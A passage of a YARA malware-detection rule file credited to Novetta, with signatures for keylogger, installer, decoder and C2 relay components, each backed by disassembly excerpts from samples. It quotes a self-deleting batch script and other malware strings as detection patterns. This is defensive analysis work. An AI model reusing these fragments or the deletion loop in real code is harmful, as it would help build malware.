    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "66a21f8c72bb4f314604526e9bf1736f75b06cf37dd3077eb292941b476c3235"
    strings:
        /*
        69 C0 28 01 00 00       imul eax, 128h
        50                      push eax                ; size_t
        53                      push ebx                ; int
        FF B5 AC FD FF FF       push [ebp+configRecords]; void *
        E8 6E 08 00 00          call _memset
        8B 85 A4 FC FF FF       mov eax, [ebp+var_35C.dwRecordCnt]
        69 C0 28 01 00 00       imul eax, 128h
        50                      push eax                ; size_t
        8B 85 C4 FE FF FF       mov eax, [ebp+hMem]
        05 08 01 00 00          add eax, 108h
        50                      push eax                ; void *
        FF B5 AC FD FF FF       push [ebp+configRecords]; void *
        E8 0A 05 00 00          call _memcpy
        83 C4 18                add esp, 18h
        8B BD A4 FC FF FF       mov edi, [ebp+var_35C.dwRecordCnt]
        69 FF 28 01 00 00       imul edi, 128h
        81 C7 08 01 00 00       add edi, 108h
        */
        // The 128h multiplier and 108h offset are kept literal; the two alternations accept
        // either the immediate add shown above or a two-byte 03 ?? encoding in its place.
        $a = {69 ?? 28 01 00 00 5? 5? FF B5 [4] E8 [4] 8B [5] 69 ?? 28 01 00 00 50 8B [5] (05 08 01 00 00 | 03 ??) 50 FF [5] E8 [4] 83 C4 ?? 8B [5] 69 ?? 28 01 00 00 (81 C7 08 01 00 00 | 03 ??)}
    condition:
        $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

rule IndiaGolf
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "3dda69dfb254dcaea2ba6e8323d4b61ab1e130a0694f4c43d336cfb86a760c50"
    strings:
        /*
        FF D6                   call esi                ; rand
        8B F8                   mov edi, eax
        C1 E7 10                shl edi, 10h
        FF D6                   call esi                ; rand
        03 F8                   add edi, eax
        89 7C 24 20             mov [esp+2A90h+var_2A70], edi
        FF D6                   call esi                ; rand
        8B F8                   mov edi, eax
        C1 E7 10                shl edi, 10h
        FF D6                   call esi                ; rand
        03 F8                   add edi, eax
        89 7C 24 24             mov [esp+2A90h+var_2A6C], edi
        */
        // Two rounds of (call; mov; shl 10h; call; add; mov) with register bytes wildcarded.
        $generateRandomID = {FF ?? 8B ?? C1 ?? 10 FF ?? 03 F8 89 [3] FF ?? 8B ?? C1 ?? 10 FF ?? 03 ?? 89}
    condition:
        $generateRandomID in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

rule IndiaHotel
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "8a4fc5007faf85e07710dca705108df9fd6252fe3d57dfade314120d72f6d83f"
    strings:
        /*
        6A 0A                   push 0Ah                ; int
        8D 85 C4 E4 FF FF       lea eax, [ebp+Source]
        68 10 02 00 00          push 210h               ; unsigned int
        50                      push eax                ; void *
        E8 FA 60 00 00          call ??_L@YGXPAXIHP6EX0@Z1@Z; `eh vector constructor iterator'(void *,uint,int,void (*)(void *),void (*)(void *))
        */
        // [5-6] allows for either a 5- or 6-byte lea encoding between push 0Ah and push 210h.
        $fileExtractorArraySetup = {6A 0A 8D [5-6] 68 10 02 00 00 50 E8}
    condition:
        $fileExtractorArraySetup in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

rule IndiaJuliett_1
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source_writeFile = "a164c0ba0be7c33778c12a6457e9c55a2935564a"
    strings:
        // NUL-delimited "scardprv.dll"
        $configFilename = {00 73 63 61 72 64 70 72 76 2E 64 6C 6C 00}
        // Same batch script literal as $s5 in IndiaCharlie_Two.
        $suicideScript = ":R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat"
        $commKey = { 10 20 30 40 50 60 70 80 90 11 12 13 1A FF EE 48 }
        /*
        .text:10001850          push 7530h              ; dwTimeout
        .text:10001855          lea eax, [esp+420h+a2]
        .text:10001859          push 4                  ; len
        .text:1000185B          push eax                ; a2
        .text:1000185C          push esi                ; s
        .text:1000185D          mov dword ptr [esp+42Ch+a2], 1000h
        .text:10001865          call CommSendWithTimeout
        .text:1000186A          add esp, 14h
        .text:1000186D          cmp eax, 0FFFFFFFFh
        .text:10001870          jz loc_10001915
        .text:10001876          lea ecx, [esp+418h+random]
        .text:1000187A          push ecx                ; a1
        .text:1000187B          call Generate16ByteRandomBuffer
        .text:10001880          push 0                  ; fEncrypt
        .text:10001882          push 7530h              ; dwTimeout
        */
        // Bracketed by the two "push 7530h" (68 30 75 00 00) instructions shown above.
        $handshake = { 68 30 75
00 00 [4] 6A 04 5? 5? C? [3] 00 10 00 00 E8 [7] 83 F8 FF 0F 84 ?? ?? 00 00 8? [3] 5? E8 [4] 6A 00 68 30 75 00 00 }
        /*
        68 00 28 00 00          push 2800h
        56                      push esi
        E8 38 F7 FF FF          call sub_401000
        // optionally there is a "add esp, 8" in some variants here
        8D 44 24 28             lea eax, [esp+270h+NumberOfBytesWritten]
        6A 00                   push 0                  ; lpOverlapped
        50                      push eax                ; lpNumberOfBytesWritten
        68 00 28 00 00          push 2800h              ; nNumberOfBytesToWrite
        56                      push esi                ; lpBuffer
        53                      push ebx                ; hFile
        FF 15 6C 80 40 00       call ds:WriteFile
        81 ED 00 28 00 00       sub ebp, 2800h
        81 C7 00 28 00 00       add edi, 2800h
        81 C6 00 28 00 00       add esi, 2800h
        */
        // The [4-7] jump after the call absorbs the optional "add esp, 8" mentioned above.
        $writeFile = {68 00 28 00 00 5? E8 [4-7] 8D [3] 6A 00 5? 68 00 28 00 00 5? 5? FF 15 [4] 81 ?? 00 28 00 00 81 ?? 00 28 00 00 81 ?? 00 28 00 00}
    condition:
        // Config filename / suicide script are searched in .data, handshake and key in .rsrc,
        // and the write loop in .text. Any section that is absent yields an undefined
        // range, so that term evaluates false rather than matching anywhere in the file.
        ($configFilename in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) or $suicideScript in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)))
        or ($handshake in ((pe.sections[pe.section_index(".rsrc")].raw_data_offset)..(pe.sections[pe.section_index(".rsrc")].raw_data_offset + pe.sections[pe.section_index(".rsrc")].raw_data_size)) and $commKey in ((pe.sections[pe.section_index(".rsrc")].raw_data_offset)..(pe.sections[pe.section_index(".rsrc")].raw_data_offset + pe.sections[pe.section_index(".rsrc")].raw_data_size)))
        or $writeFile in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

rule IndiaWhiskey
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "0c729deec341267c5a9a2271f20266ac3b0775d70436c7770ddc20605088f3b4"
        Description = "Winsec Installer"
    strings:
        /*
        // Service installation code
        FF 15 68 30 40 00       call ds:wsprintfA
        83 C4 18                add esp, 18h
        8D 85 FC FE FF FF       lea eax, [ebp+var_104]
        56                      push esi
        56                      push esi
        56                      push esi
        56                      push esi
        56                      push esi
        50                      push eax
        6A 01                   push 1
        // some variants have these two lines added
        5E                      pop esi
        56                      push esi
        6A 02                   push 2
        68 20 01 00 00          push 120h
        68 FF 01 0F 00          push 0F01FFh
        FF 75 0C                push [ebp+arg_4]
        FF 75 08                push [ebp+arg_0]
        // some variants have the next line as a push {reg} or push {stack var}
        53                      push ebx
        //or
        FF 75 FC                push [ebp+var_4]
        FF 15 E4 49 40 00       call CreateServiceA
        */
        // [0-2] absorbs the optional pop esi / push esi pair; (5? | FF 75 ??) covers the
        // push-register versus push-stack-variable variants described above.
        $a = {FF 15 [4] 83 C4 18 8D [5] 5? 5? 5? 5? 5? 5? 6A 01 [0-2] 6A 02 68 20 01 00 00 68 FF 01 0F 00 FF 75 ?? FF 75 ?? (5? | FF 75 ??) FF 15}
    condition:
        $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

rule KiloAlfa
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        type = "Keylogger"
        SourceForDnscalcVariant1 = "b855d05ef7ab6582864c9b35052a1073a6eb7d0c7e9d97f524ec062715d71321"
        SourceForDnscalcVariant2 = "ddde628be8cd5db768b807510ae1319888e6c4550a5b9a0d54e17b9ec4aaa256"
    strings:
        /*
        push <variable>
        call GetAsyncKeyState
        cmp ax, 8001h
        jnz short loc_4021EE
        push <variable>         ; a1
        call AddCharacterToKeyLogBuffer
        add esp, 4

        this block of code is used multiple times in sequence so i'm looking for 5 consecutive blocks
        */
        // NOTE(review): as written the pattern contains four repetitions of the
        // (68 .. FF 15 .. 66 .. 01 80 75 .. 6A .. E8 .. 83 C4 04) block, not five as the
        // comment above says. Kept unchanged here; confirm the intended count.
        $keyxlate = {68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04 68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04 68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04 68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04}
        /*
        6A 2A                   push 2Ah
        C6 84 24 C4 00 00 00 D6 mov [esp+70Ch+var_648], 0D6h
        C6 84 24 C5 00 00 00 E1 mov [esp+70Ch+var_647], 0E1h
        C6 84 24 C6 00 00 00 BF mov [esp+70Ch+var_646], 0BFh
        C6 84 24 C7 00 00 00 C8 mov [esp+70Ch+var_645], 0C8h
        C6 84 24 C8 00 00 00 C3 mov [esp+70Ch+var_644], 0C3h
        C6 84 24 C9 00 00 00 BD mov [esp+70Ch+var_643], 0BDh
        88 9C 24 CA 00 00 00    mov [esp+70Ch+var_642], bl
        FF 15 48 5B 40 00       call GetAsyncKeyState
        66 3D 01 80             cmp ax, 8001h
        75 20                   jnz short loc_401696
        8D 94 24 00 01 00 00    lea edx, [esp+708h+pszOutput]
        8D 84 24 C0 00 00 00    lea eax, [esp+708h+var_648]
        52                      push edx                ; pszOutput
        6A 07                   push 7                  ; dwLength
        50                      push eax                ; pszInput
        E8 A3 F9 FF FF          call DNSCALCDecode
        50                      push eax                ; a1
        E8 7D FB FF FF          call AddEntryToKeylogDataBuffer
        83 C4 10                add esp, 10h
        */
        // Byte-at-a-time build of the 6-byte constant D6 E1 BF C8 C3 BD, then the 8001h compare.
        $keyxlateDnscalc1 = { 6A 2A C6 [6] D6 C6 [6] E1 C6 [6] BF C6 [6] C8 C6 [6] C3 C6 [6] BD 88 [6] FF 15 [4] 66 3D 01 80 75 ?? 8D [6] 8D [6] 5? 6A 07 5? E8 [4] 50 E8 [4] 83 C4 10 }
        /*
        6A 2A                   push 2Ah
        C7 85 74 FF FF FF D6 E1 BF C8 mov dword ptr [ebp+var_8C], 0C8BFE1D6h
        66 C7 85 78 FF FF FF C3 BD mov [ebp+var_88], 0BDC3h
        88 9D 7A FF FF FF       mov [ebp+var_86], bl
        FF 15 04 47 41 00       call GetAsyncKeyState
        BA 01 80 FF FF          mov edx, 0FFFF8001h
        66 3B C2                cmp ax, dx
        75 1E                   jnz short loc_4018B0
        8D 85 CC FE FF FF       lea eax, [ebp+a3]
        50                      push eax                ; a3
        8D 8D 74 FF FF FF       lea ecx, [ebp+var_8C]
        6A 07                   push 7                  ; dwLength
        51                      push ecx                ; a1
        E8 89 F7 FF FF          call DNSCalcDecode
        50                      push eax                ; a1
        E8 83 F9 FF FF          call RecordStringToLog
        83 C4 10                add esp, 10h
        */
        // Same constant written as one dword plus one word, with the compare done via edx.
        $keyxlateDnscalc2 = { 6A 2A C7 [5] D6 E1 BF C8 66 [6] C3 BD 88 [5] FF 15 [4] BA 01 80 FF FF 66 3B C2 75 ?? 8D [5] 5? 8D [5] 6A 07 5? E8 [4] 50 E8 [4] 83 C4 10 }
    condition:
        // Any one of the three variants, each constrained to the .text section's raw data.
        $keyxlate in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or $keyxlateDnscalc1 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or $keyxlateDnscalc2 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

rule LimaAlfa
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "c9fbad7fc7ff7688776056be3a41714a1f91458a7b16c37c3c906d17daac2c8b"
        Status = "Signature is too loose to be useful."
    strings:
        /*
        33 C0                   xor eax, eax
        66 8B 02                mov ax, [edx]
        8B E8                   mov ebp, eax
        81 E5 00 F0 FF FF       and ebp, 0FFFFF000h
        81 FD 00 30 00 00       cmp ebp, 3000h
        75 0D                   jnz short loc_4019FB
        8B 6C 24 18             mov ebp, [esp+10h+arg_4]
        25 FF 0F 00 00          and eax, 0FFFh
        03 C7                   add eax, edi
        01 28                   add [eax], ebp
        */
        // See the `Status` meta: flagged by the authors as too loose.
        $a = {33 C0 66 [2] 8B ?? 81 ?? 00 F0 FF FF 81 ?? 00 30 00 00 75 ?? 8B [3] 25 FF 0F 00 00 03 C7 01}
    condition:
        $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

rule LimaBravo
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "Mwsagent.dll"
    strings:
        /*
        83 C4 34                add esp, 34h
        83 FD 0A                cmp ebp, 0Ah
        5D                      pop ebp
        5B                      pop ebx
        7E 12                   jle short loc_1000106F
        57                      push edi                ; Src
        C6 07 4D                mov byte ptr [edi], 4Dh
        C6 47 01 5A             mov byte ptr [edi+1], 5Ah
        E8 97 01 00 00          call ManualImageLoad
        */
        // Writes 4Dh 5Ah ("MZ") into a buffer before the call; the two pops are optional ([0-2]).
        $a = {83 ?? 34 83 ?? 0A [0-2] 7E ?? 5? C6 ??
4D C6 [2] 5A E8}
    condition:
        $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

rule LimaCharlie
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source_x86 = "6ee6ae79ee1502a11ece81e971a54f189a271be9ec700101a2bd7a21198b94c7"
        Source_x64 = "90ace24eb132c776a6d5bb0451437db21e84601495a2165d75f520af637e71e8"
    strings:
        // The misspelled format string is enough on its own (see condition); it is not
        // restricted to any section.
        $misspelling = "Defualt Sleep = %d" wide
        /*
        FF 76 74                push dword ptr [esi+74h]
        59                      pop ecx
        50                      push eax
        8F 86 48 01 00 00       pop dword ptr [esi+148h]
        85 C0                   test eax, eax
        51                      push ecx
        8F 86 44 01 00 00       pop dword ptr [esi+144h]
        75 3D                   jnz short loc_100035F3
        F6 46 56 01             test byte ptr [esi+56h], 1
        74 0A                   jz short loc_100035C6
        */
        $x86 = {FF ?? 74 5? 5? 8F ?? 48 01 00 00 85 C0 5? 8F ?? 44 01 00 00 75 ?? F6 [2] 01 74}
        /*
        48 8B 4B 70             mov rcx, [rbx+70h]
        48 89 8B 60 01 00 00    mov [rbx+160h], rcx
        48 89 83 68 01 00 00    mov [rbx+168h], rax
        48 85 C0                test rax, rax
        75 35                   jnz short loc_180002372
        F6 43 56 01             test byte ptr [rbx+56h], 1
        74 07                   jz short loc_18000234A
        */
        $x64 = {48 [2] 70 48 [2] 60 01 00 00 48 [2] 68 01 00 00 48 85 C0 75 ?? F6 [2] 01 74}
    condition:
        $x86 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or $x64 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or $misspelling
}

import "pe"

rule LimaDelta
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "81e6118a6d8bf8994ce93f940059217481bfd15f2757c48c589983a6af54cfcc"
    strings:
        /*
        8B 69 FC                mov ebp, [ecx-4]
        83 C1 10                add ecx, 10h
        81 F5 6D 3A 71 58       xor ebp, 58713A6Dh
        89 2A                   mov [edx], ebp
        33 ED                   xor ebp, ebp
        66 8B 69 F0             mov bp, [ecx-10h]
        89 6A 04                mov [edx+4], ebp
        83 C2 08                add edx, 8
        4F                      dec edi
        75 E3                   jnz short loc_4026CE
        */
        // The XOR constant 58713A6Dh (6D 3A 71 58 little-endian) is kept literal.
        $fileDecoder = {8B ?? ?? 83 ?? 10 81 ?? 6D 3A 71 58 89 ?? 33 ?? 66 ?? ?? F0 89 ?? 04 83 ?? 08 4? 75}
        /*
        66 81 BC 24 A0 00 00 00 BB 01 cmp [esp+98h+arg_4], 1BBh
        74 21                   jz short loc_401BD7
        FF 15 58 30 40 00       call ds:rand
        99                      cdq
        B9 32 00 00 00          mov ecx, 32h
        F7 F9                   idiv ecx
        8B DA                   mov ebx, edx
        8D 54 24 5E             lea edx, [esp+98h+var_3A]
        53                      push ebx                ; dwSize
        52                      push edx                ; pvBuffer
        E8 3F FB FF FF          call GenerateRandomBuffer
        83 C4 08                add esp, 8
        83 C3 46                add ebx, 46h
        */
        // Starts at the 1BBh immediate (BB 01) of the compare; rand() result reduced mod 32h.
        $authenicateBufferGen = {BB 01 74 ?? FF 15 [4] 99 B? 32 00 00 00 F7 ?? 8B ?? 8D [3] 5? 5? E8 [4] 83 C4 08 83 ?? 46}
    condition:
        $authenicateBufferGen in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or $fileDecoder in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule PapaAlfa
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    strings:
        // "pmsconfig.msi" and the %s-heavy format string are shared with the
        // IndiaBravo_PapaAlfa and IndiaBravo_RomeoCharlie rules above.
        $ = "pmsconfig.msi" wide
        $ = "pmslog.msi" wide
        $ = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d"
        $ = "CreatP2P Thread" wide
        $ = "GreatP2P Thread" wide
    condition:
        3 of them
}

import "pe"

rule RomeoAlfa
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "fba0b8bdc1be44d100ac31b864830fcc9d056f1f5ab5486384e09bd088256dd0.file2.bin"
    strings:
        /*
        68 C4 94 41 00          push offset a0_0_0_0    ; "0.0.0.0"
        56                      push esi                ; wchar_t *
        E8 1C B4 00 00          call _wcscpy
        83 C6 28                add esi, 28h
        83 C4 08                add esp, 8
        81 FE E8 CD 41 00       cmp esi, offset unk_41CDE8
        7C E7                   jl short loc_4039DA
        */
        $zeroIPLoader = {68 [4] 56 E8 [4] 83 C6 28 83 C4 08 81 FE [4] 7C E?}
        // push esi
        // mov esi, [esp+4+a1]
        // test esi, esi
        // jle short loc_403FEB
        // push edi
        // mov edi, ds:Sleep
        // push 0EA60h ; dwMilliseconds
        // call edi ; Sleep
        // dec esi
        // jnz short loc_403FE0
        // pop edi
        // pop esi
        // retn
        $sleeper = {5? 8B [3] 85 ?? 7E ?? 5? 8B 3D [4] 68 [4] FF ?? 4? 75 ?? 5? 5?
C3 }
        // Exclusion string: files containing "xercesc" never match (see condition).
        $xercesc = "xercesc"
    condition:
        ($sleeper in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or $zeroIPLoader in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)))
        and not $xercesc
}

import "pe"

rule RomeoBravo
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "95314a7af76ec36cfba1a02b67c2b81526a04e3b2f9b8fb9b383ffcbcc5a3d9b"
    strings:
        /*
        E8 D9 FC FF FF          call SendData
        83 C4 10                add esp, 10h
        85 C0                   test eax, eax
        74 0A                   jz short loc_10003FE8
        B8 02 00 00 00          mov eax, 2
        5E                      pop esi
        83 C4 18                add esp, 18h
        C3                      retn
        6A 78                   push 78h                ; dwTimeout
        6A 01                   push 1                  ; fDecode
        8D 54 24 18             lea edx, [esp+24h+recvData]
        6A 0C                   push 0Ch                ; dwLength
        52                      push edx                ; pvBuffer
        56                      push esi                ; skt
        E8 57 FD FF FF          call RecvData
        83 C4 14                add esp, 14h
        85 C0                   test eax, eax
        74 0A                   jz short loc_1000400A
        B8 02 00 00 00          mov eax, 2
        */
        // Send/receive error path returning 2, with the 78h timeout and 0Ch length literal.
        $a = {E8 [4] 83 C4 10 85 C0 74 ?? B? 02 00 00 00 5? 83 C4 18 C3 6A 78 6A 01 8D [3] 6A 0C 5? 5? E8 [4] 83 C4 14 85 C0 74 ?? B8 02 00 00 00}
    condition:
        $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

rule RomeoCharlie
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "a82108ef7115931b3fbe1fab99448c4139e22feda27c1b1d29325710671154e8"
    strings:
        // Both $auth strings together are sufficient on their own (see condition).
        $auth1 = "Success - Accept Auth"
        $auth2 = "Fail - Accept Auth"
        /*
        81 E3 FF FF 00 00       and ebx, 0FFFFh
        8B EB                   mov ebp, ebx
        57                      push edi
        C1 EE 10                shr esi, 10h
        81 E5 FF FF 00 00       and ebp, 0FFFFh
        8B FE                   mov edi, esi
        8B C5                   mov eax, ebp
        81 E7 FF FF 00 00       and edi, 0FFFFh
        C1 E0 10                shl eax, 10h
        6A 00                   push 0                  ; _DWORD
        0B C7                   or eax, edi
        6A 00                   push 0                  ; _DWORD
        50                      push eax                ; _DWORD
        68 10 14 11 71          push offset sub_71111410; _DWORD
        6A 00                   push 0                  ; _DWORD
        6A 00                   push 0                  ; _DWORD
        FF 15 5C 8E 12 71       call CreateThread_0
        C1 E7 10                shl edi, 10h
        */
        $startupRelayThreads = {81 ?? FF FF 00 00 8B ?? 5? C1 ?? 10 81 ?? FF FF 00 00 8B ?? 8B ?? 81 ?? FF FF 00 00 C1 ?? 10 6A 00 0B ?? 6A 00 50 68 [4] 6A 00 6A 00 FF 15 [4] C1 ?? 10 }
        /*
        source: 641808833ad34f2e5143001c8147d779dbfd2a80a80ce0cfc81474d422882adb
        25 00 20 00 00          and eax, 2000h
        3D 00 20 00 00          cmp eax, 2000h
        0F 94 C1                setz cl
        81 E2 80 00 00 00       and edx, 80h
        33 C0                   xor eax, eax
        80 FA 80                cmp dl, 80h
        0F 94 C0                setz al
        03 C8                   add ecx, eax
        33 D2                   xor edx, edx
        83 F9 01                cmp ecx, 1
        */
        $crypto = {2? 00 20 00 00 3? 00 20 00 00 0F [2] 81 ?? 80 00 00 00 33 ?? 80 ?? 80 0F [2] 03 ?? 33 ?? 83 ?? 01 }
    condition:
        all of ($auth*)
        or $startupRelayThreads in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or $crypto in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

rule RomeoDelta
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "1df2af99fb3b6e31067b06df07b96d0ed0632f85111541a416da9ceda709237c"
    strings:
        /*
        E8 78 00 00 00          call GenerateRandomBuffer
        33 C0                   xor eax, eax
        8A 4C 04 04             mov cl, [esp+eax+24h+buffer]
        80 E9 22                sub cl, 22h
        80 F1 AD                xor cl, 0ADh
        88 4C 04 04             mov [esp+eax+24h+buffer], cl
        40                      inc eax
        83 F8 10                cmp eax, 10h
        7C EC                   jl short loc_1000117A
        6A 01                   push 1                  ; fEncode
        8D 54 24 08             lea edx, [esp+28h+buffer]
        6A 10                   push 10h                ; dwDataLength
        52                      push edx                ; pvData
        8B CB                   mov ecx, ebx            ; this
        E8 A2 00 00 00          call CSocket__Send
        */
        // 16-byte sub/xor transform loop followed by a 10h-byte send; the sub and xor
        // immediates are wildcarded ([2]), the 10h loop bound and length are literal.
        $loginInit = { E8 [4] 33 C0 8A [3] 80 [2] 80 [2] 88 [3] 40 83 F8 10 7C ?? 6A 01 8D [3] 6A 10 5?
8B CB E8 }
    condition:
        $loginInit in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

rule RomeoEcho
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    strings:
        $ = "%s %-20s %10lu %s"
        $ = "_quit"
        $ = "_exe"
        $ = "_put"
        $ = "_get"
    condition:
        // All five short strings are required; there is no section or file-type gate.
        all of them
}

// This rule has been modified by @mmorenog @yarules to fix some errors
import "pe"

rule RomeoFoxtrot
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "dropped.bin"
        Source_relativeCalls = "635bebe95671336865f8a546f06bf67ab836ea35795581d8a473ef2cd5ff4a7f"
    strings:
        /*
        C7 44 24 08 01 00 00 00 mov [esp+128h+argp], 1
        8B 8C 24 30 01 00 00    mov ecx, dword ptr [esp+128h+wPort]
        C7 44 24 04 00 00 20 03 mov dword ptr [esp+128h+optval], 3200000h
        51                      push ecx                ; hostshort
        89 44 24 1C             mov dword ptr [esp+12Ch+name.sin_addr.S_un], eax
        FF 15 8C 01 FF 7E       call ds:htons
        6A 06                   push 6                  ; protocol
        6A 01                   push 1                  ; type
        6A 02                   push 2                  ; af
        66 89 44 24 22          mov [esp+134h+name.sin_port], ax
        66 C7 44 24 20 02 00    mov [esp+134h+name.sin_family], 2
        FF 15 84 01 FF 7E       call ds:socket          <--- this could be a relative call in some variants
        83 F8 FF                cmp eax, 0FFFFFFFFh
        89 46 04                mov [esi+4], eax
        0F 84 AD 00 00 00       jz loc_7EFE4C63
        57                      push edi
        8B 3D 88 01 FF 7E       mov edi, ds:setsockopt  <---- this line is missing when relative calls are used
        8D 54 24 08             lea edx, [esp+12Ch+optval]
        6A 04                   push 4                  ; optlen
        52                      push edx                ; optval
        68 02 10 00 00          push 1002h              ; optname
        68 FF FF 00 00          push 0FFFFh             ; level
        50                      push eax                ; s
        FF D7                   call edi                ; setsockopt <--- this could be a relative call in some variants
        8B 4E 04                mov ecx, [esi+4]
        8D 44 24 08             lea eax, [esp+12Ch+optval]
        6A 04                   push 4                  ; optlen
        50                      push eax                ; optval
        68 01 10 00 00          push 1001h              ; optname
        68 FF FF 00 00          push 0FFFFh             ; level
        51                      push ecx                ; s
        FF D7                   call edi                ; setsockopt <--- this could be a relative call in some variants
        */
        // ( FF 15 | E8 ) and ( FF D? | E8 [3] ??) accept the indirect and relative call
        // encodings described above; [0-7] absorbs the optional push edi / mov edi pair.
        $connect = { C7 [3] 01 00 00 00 8B [6] C7 [3] 00 00 20 03 5? 89 [3] ( FF 15 | E8 ) [4] 6A 06 6A 01 6A 02 66 [4] 66 [4] 02 00 ( FF 15 | E8 ) [4] 83 F8 FF 89 [2] 0F 84 [4] [0-7] 8D [3] 6A 04 5? 68 02 10 00 00 68 FF FF 00 00 5? ( FF D? | E8 [3] ??) 8B [2] 8D [3] 6A 04 5? 68 01 10 00 00 68 FF FF 00 00 5? ( FF D? | E8 [3] ??) }
        // The response string alone is sufficient (see condition).
        $response = "RESPONSE 200 OK!!!"
    condition:
